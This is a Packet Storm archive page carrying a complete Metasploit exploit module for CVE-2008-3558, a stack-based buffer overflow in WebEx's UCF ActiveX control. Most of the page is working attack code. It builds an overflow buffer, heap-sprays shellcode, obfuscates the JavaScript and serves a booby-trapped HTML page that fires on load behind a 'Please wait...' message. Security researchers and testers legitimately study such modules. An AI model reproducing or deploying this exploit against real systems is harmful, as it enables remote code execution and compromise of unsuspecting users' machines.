exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow

WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
Posted Mar 4, 2010
Authored by Tobias Klein, Elazar Broad, Guido Landi | Site metasploit.com

This Metasploit module exploits a stack-based buffer overflow in WebEx's WebexUCFObject ActiveX Control. If an long string is passed to the 'NewObject' method, a stack- based buffer overflow will occur when copying attacker-supplied data using the sprintf function. It is noteworthy that this vulnerability was discovered and reported by multiple independent researchers.

tags | exploit, overflow, activex
advisories | CVE-2008-3558
SHA-256 | e43768f68be7b3013f27418eda7f1bf2522747aecec1b523657fd01ec1c70da7

WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow

Change Mirror Download
##
# $Id: webex_ucf_newobject.rb 8712 2010-03-04 17:41:26Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject
ActiveX Control. If an long string is passed to the 'NewObject' method, a stack-
based buffer overflow will occur when copying attacker-supplied data using the
sprintf function.

It is noteworthy that this vulnerability was discovered and reported by multiple
independent researchers. To quote iDefense's advisory, "Before this issue was
publicly reported, at least three independent security researchers had knowledge
of this issue; thus, it is reasonable to believe that even more people were aware
of this issue before disclosure."

NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload
into memory unmodified.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tobias Klein', # initial discoverer
'Elazar Broad', # initial discoverer
'Guido Landi', # milw0rm exploit
'jduck' # metasploit version
],
'Version' => '$Revision: 8712 $',
'References' =>
[
[ 'CVE', '2008-3558' ],
[ 'OSVDB', '47344' ],
[ 'BID', '30578' ],
[ 'URL', 'http://www.exploit-db.com/exploits/6220' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849' ],
[ 'URL', 'http://www.trapkit.de/advisories/TKADV2008-009.txt' ],
[ 'URL', 'http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html' ],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html' ],
[ 'URL', 'http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
# Tested with atucfobj.dll v20.2008.2601.4928
[ 'Windows Universal', { 'Ret' => 0x0c0c0c0c } ],
],
'DefaultTarget' => 0))
end

def autofilter
false
end

def check_dependencies
use_zlib
end

def on_request_uri(cli, request)

# ActiveX parameters
progid = "WebexUCFObject.WebexUCFObject"
clsid = "32E26FD9-F435-4A20-A561-35D4B987CFDC"

# Set parameters
fnname = rand_text_alpha(8+rand(8))
offset = 232

# Build the exploit buffer
sploit = rand_text_alphanumeric(offset)
sploit << [target.ret - 0x20000].pack('V')

# Encode variables
sploit = Rex::Text.to_hex(sploit, '%')
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

# Prepare the heap spray parameters
spray_num = "0x%x" % target.ret

# Generate the final javascript
js = %Q|
function #{fnname}()
{
try {
var obj = new ActiveXObject("#{progid}");
var my_unescape = unescape;
var shellcode = '#{shellcode}';
#{js_heap_spray}
sprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000);
var sploit = my_unescape("#{sploit}");
obj.NewObject(sploit);
} catch( e ) { window.location = 'about:blank' ; }
}
|

# Obfuscate the javascript
opts = {
'Strings' => true,
'Symbols' => {
'Variables' => %w{ obj my_unescape shellcode arg1 arg2 sploit }
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
js.obfuscate()

# Build the final HTML
content = %Q|<html>
<head>
<script language=javascript>
#{js}
</script>
</head>
<body onload="#{fnname}()">
Please wait...
</body>
</html>
|

print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

send_response_html(cli, content)

handler(cli)

end

end
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close